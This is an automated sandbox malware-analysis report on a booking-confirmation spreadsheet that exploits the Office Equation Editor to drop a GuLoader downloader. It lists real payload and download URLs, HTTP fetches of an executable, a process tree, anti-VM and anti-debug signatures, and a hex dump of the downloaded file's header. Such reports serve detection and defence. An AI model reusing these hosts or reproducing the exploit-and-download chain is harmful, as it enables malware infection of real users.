Play interactive tour

Edit tour

Windows Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name:	Booking Confirmation.xlsx
Analysis ID:	448719
MD5:	870a4c72bccd58de144c7b845d56c626
SHA1:	482681f75180bbb1286e1f93ce44dfae0b6b0007
SHA256:	37fffcbacca59290a7a3b6271ebf475a50b9e17eba113459cfc00508a7268b68
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2668 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 3056 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2552 cmdline: 'C:\Users\Public\vbc.exe' MD5: FCFB0EC70F1419EDE8A534CC95CB61E9)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\vbc.exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000006.00000000.2148896829.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.vbc.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
6.0.vbc.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3056, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3056, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3056, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2552

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://180.214.239.39/port/.svchost.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 72MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://ceattire.com/bin_UYDMbHwI28.bin

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 14 Jul 2021 14:55:35 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 13 Jul 2021 17:05:39 GMTETag: "41470-5c7043f493d18"Accept-Ranges: bytesContent-Length: 267376Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Source: global traffic

HTTP traffic detected: GET /port/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E10AF3D.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 3E10AF3D.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A54E7 NtAllocateVirtualMemory,		6_2_002A54E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A55AC NtAllocateVirtualMemory,		6_2_002A55AC

Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A54E7	6_2_002A54E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A7036	6_2_002A7036
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A100E	6_2_002A100E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A4071	6_2_002A4071
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A80D4	6_2_002A80D4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A2940	6_2_002A2940
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A2958	6_2_002A2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A29B0	6_2_002A29B0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A2183	6_2_002A2183
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A42CD	6_2_002A42CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A72C3	6_2_002A72C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A1B2D	6_2_002A1B2D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A1B1A	6_2_002A1B1A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A7B73	6_2_002A7B73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A1B5F	6_2_002A1B5F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A4B8E	6_2_002A4B8E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A8385	6_2_002A8385
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A43F1	6_2_002A43F1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A341B	6_2_002A341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A844C	6_2_002A844C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A8C82	6_2_002A8C82
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A34C4	6_2_002A34C4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A8CD5	6_2_002A8CD5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A350F	6_2_002A350F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A8D58	6_2_002A8D58
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A7D52	6_2_002A7D52
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A0EFE	6_2_002A0EFE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A3F0C	6_2_002A3F0C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A7F03	6_2_002A7F03
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A7F6D	6_2_002A7F6D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A0FB5	6_2_002A0FB5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A4785	6_2_002A4785
Source: C:\Users\Public\vbc.exe	Code function: 6_2_002A2793	6_2_002A2793

Source: Booking Confirmation.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/11@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Booking Confirmation.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE916.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Booking Confirmation.xlsx

Static file information: File size 1221992 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Source: Booking Confirmation.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Booking Confirmation.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Show sources

Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2148896829.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040495E push es; ret	6_2_00404963
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221774 push edx; ret	6_2_002217A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221023 push edx; ret	6_2_00221051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222823 push edx; ret	6_2_00222851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224023 push edx; ret	6_2_00224051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00227024 push edx; ret	6_2_00227051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225825 push edx; ret	6_2_00225851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224833 push edx; ret	6_2_00224861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223033 push edx; ret	6_2_00223061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221833 push edx; ret	6_2_00221861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226034 push edx; ret	6_2_00226061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220038 push edx; ret	6_2_00220061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224803 push edx; ret	6_2_00224831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223003 push edx; ret	6_2_00223031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221803 push edx; ret	6_2_00221831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226004 push edx; ret	6_2_00226031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220008 push edx; ret	6_2_00220031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223813 push edx; ret	6_2_00223841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225013 push edx; ret	6_2_00225041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222014 push edx; ret	6_2_00222041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226814 push edx; ret	6_2_00226841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220818 push edx; ret	6_2_00220841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223063 push edx; ret	6_2_00223091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221863 push edx; ret	6_2_00221891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224863 push edx; ret	6_2_00224891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226065 push edx; ret	6_2_00226091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220068 push edx; ret	6_2_00220091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222074 push edx; ret	6_2_002220A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223874 push edx; ret	6_2_002238A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225074 push edx; ret	6_2_002250A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226875 push edx; ret	6_2_002268A1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
